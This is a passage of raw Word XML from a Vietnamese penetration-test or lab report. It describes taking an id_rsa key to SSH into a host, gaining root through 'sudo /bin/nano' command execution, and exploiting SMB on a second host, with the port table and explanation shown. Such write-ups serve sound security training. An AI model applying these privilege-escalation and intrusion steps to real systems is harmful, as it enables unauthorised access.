        <w:t xml:space="preserve">Ta tiến hành lấy file id_rsa lưu vào phía máy của mình và cấp phát quyền cho file private.key (id_rsa) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094671B0" w14:textId="7C2BAAFD" w:rsidR="621E152A" w:rsidRDefault="621E152A" w:rsidP="6FA95578">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B558D2" wp14:editId="55D51A84">
            <wp:extent cx="4572000" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="867837026" name="Picture 19017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725640"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">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D9E5B72" w14:textId="7816F4B1" w:rsidR="621E152A" w:rsidRDefault="621E152A" w:rsidP="68C1C68F">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó tiến hành kết nối ssh vào </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidRPr="68C1C68F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cnsc@192.168.19.115</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="026538A7" w14:textId="7816F4B1" w:rsidR="621E152A" w:rsidRDefault="621E152A" w:rsidP="68C1C68F">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F7F62B" wp14:editId="587E2674">
            <wp:extent cx="4572000" cy="4229100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1585556260" name="Picture 7105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48046"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">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705B3452" w14:textId="4E48C488" w:rsidR="621E152A" w:rsidRDefault="621E152A" w:rsidP="6DF7E98A">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Truy cập vào root với lệnh s</w:t>
      </w:r>
      <w:r w:rsidRPr="6DF7E98A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo /bin/nano /opt/priv</w:t>
      </w:r>
      <w:r w:rsidR="55D53288" w:rsidRPr="6DF7E98A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4225EFE2" w:rsidRPr="321E5494">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4225EFE2">
        <w:t xml:space="preserve">thì truy cập thành công </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14673D7A" w14:textId="23C30857" w:rsidR="55D53288" w:rsidRDefault="4225EFE2" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:lastRenderedPageBreak/>
        <w:t>Nhấn tố hợp Ctrl R sau đó Ctrl X để thực thì lệnh trên nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57F4A2" w14:textId="6EB00ED8" w:rsidR="55D53288" w:rsidRDefault="4225EFE2" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:t>Và ta nhập lệnh bên dưới thì sẽ vào được root và từ đó tìm proof.txt và flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E7BA8" w14:textId="5B5DFC25" w:rsidR="55D53288" w:rsidRDefault="4225EFE2" w:rsidP="6DF7E98A">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E2FEB89" wp14:editId="12F76427">
            <wp:extent cx="5819776" cy="788095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175540176" name="Picture 19181937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93729"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5819776" cy="788095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018803C" w14:textId="5AE97EAB" w:rsidR="00C366A5" w:rsidRDefault="0007091B" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Hình ảnh minh chứng</w:t>
      </w:r>
      <w:r w:rsidR="00C366A5" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F30910" w14:textId="611F51ED" w:rsidR="00604C01" w:rsidRDefault="00604C01" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0996CAA4" wp14:editId="78E8AB60">
            <wp:extent cx="5819775" cy="788095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918193729" name="Picture 19181937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3729" name="Picture 1918193729"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19775" cy="788095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9C62D" w14:textId="3DFA90EF" w:rsidR="00C366A5" w:rsidRDefault="0007091B" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nội dung tập tin </w:t>
      </w:r>
      <w:r w:rsidR="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Proof.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C366A5" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582D1B0" w14:textId="35DFF852" w:rsidR="00604C01" w:rsidRDefault="00604C01" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C462EAA" wp14:editId="5B791788">
            <wp:extent cx="5753100" cy="827008"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1004916015" name="Picture 100491601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100" cy="827008"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424673F" w14:textId="26CB7375" w:rsidR="00C366A5" w:rsidRPr="00D40BBF" w:rsidRDefault="00C366A5" w:rsidP="0007091B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DE71CD" w14:textId="77777777" w:rsidR="005063C1" w:rsidRDefault="005063C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc57241320"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021AB77" w14:textId="51920412" w:rsidR="00B37A80" w:rsidRPr="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Địa chỉ IP của máy tồn tại lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17226">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>192.168.19.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BBE0CD" w14:textId="1579D727" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hông tin dịch vụ</w:t>
      </w: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B37A80" w14:paraId="18790E8A" w14:textId="77777777" w:rsidTr="003A380C">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00ABF9F5" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Địa chỉ IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60A0EB8B" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Các port đang mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B37A80" w14:paraId="05B1FAF3" w14:textId="77777777" w:rsidTr="2E60BB88">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="0000FF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="772F774E" w14:textId="56AA2B4F" w:rsidR="00B37A80" w:rsidRPr="004616CE" w:rsidRDefault="004616CE" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>192.168.19.116</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7300EDDC" w14:textId="4B868183" w:rsidR="00B37A80" w:rsidRPr="003E68BE" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17226">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">TCP: </w:t>
            </w:r>
            <w:r w:rsidR="0D7EB8EA" w:rsidRPr="2E60BB88">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>42, 53, 80,</w:t>
            </w:r>
            <w:r w:rsidRPr="2E60BB88">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0D7EB8EA" w:rsidRPr="72966A25">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r w:rsidR="00E626C3" w:rsidRPr="72966A25">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00927A33" w:rsidRPr="72966A25">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>445, 3389</w:t>
            </w:r>
            <w:r w:rsidR="0D7EB8EA" w:rsidRPr="72966A25">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>, 5985, 49666, 49669, 49670</w:t>
            </w:r>
            <w:r w:rsidRPr="72966A25">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B37A80" w14:paraId="4B723F19" w14:textId="77777777" w:rsidTr="2E60BB88">
        <w:trPr>
          <w:trHeight w:val="500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17F4F0A8" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRPr="00F17226" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="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2AC10F3C" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRPr="003E68BE" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17226">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">UDP: </w:t>
            </w:r>
            <w:r w:rsidRPr="001F3875">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:bCs/>
                <w:highlight w:val="red"/>
              </w:rPr>
              <w:t>[Liệt kê tất cả các port]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78EB74CD" w14:textId="4193B38F" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Khởi tạo shell với quyền user thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECCAB0" w14:textId="7BB3BDB9" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lỗ hổng đã khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="437EE9FC" w:rsidRPr="2DFF05CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ</w:t>
      </w:r>
      <w:r w:rsidRPr="2DFF05CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hổng</w:t>
      </w:r>
      <w:r w:rsidR="437EE9FC" w:rsidRPr="2DFF05CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên giao thức SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228B61F" w14:textId="3EDF9083" w:rsidR="00140499" w:rsidRDefault="00140499" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B7D5D9" wp14:editId="24939AA9">
            <wp:extent cx="4577405" cy="3540642"/>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141" cy="3545079"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3AEC0" w14:textId="17E127A6" w:rsidR="00EE0D60" w:rsidRPr="00DF4FAE" w:rsidRDefault="00EE0D60" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4628C9A2" w14:textId="76233CF3" w:rsidR="00B37A80" w:rsidRPr="00F043C0" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="613945FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giải thích lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidRPr="613945FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="6C2014BE" w:rsidRPr="613945FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB (Server Message Block) là một giao thức chia sẻ tệp mạng cho </w:t>
      </w:r>
      <w:r w:rsidR="6C2014BE" w:rsidRPr="337CB06A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>phép người dùng hoặc ứng dụng yêu cầu tệp và dịch vụ qua mạng.</w:t>
      </w:r>
      <w:r w:rsidR="69727503" w:rsidRPr="59D8D239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="69727503" w:rsidRPr="59D8D239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi sử dụng giao thức SMB, một ứng dụng (hoặc người dùng ứng dụng) có thể truy cập file trong máy chủ từ xa cũng như các nguồn tài nguyên khác, bao gồm máy in, mailslots và named pipe. </w:t>
      </w:r>
      <w:r w:rsidR="69727503" w:rsidRPr="6700DEBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi attacker khai thác lỗ hổng này có thể </w:t>
      </w:r>
      <w:r w:rsidR="69727503" w:rsidRPr="3054B6E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">chiếm được các </w:t>
      </w:r>
      <w:r w:rsidR="6B626601" w:rsidRPr="3054B6E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">đặc quyền giống như tài khoản </w:t>
      </w:r>
      <w:r w:rsidR="6B626601" w:rsidRPr="15B42C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>đang chạy máy chủ SMB và các quy trình khách. Kẻ tấn công sau đó có thể cài đặt các chương trình; xem, thay đổi hoặc xóa dữ liệu; hoặc tạo tài khoản mới với đầy đủ quyền của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC23E5" w14:textId="5B40631D" w:rsidR="00B37A80" w:rsidRPr="00F043C0" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến nghị vá lỗ hổng</w:t>
      </w:r>
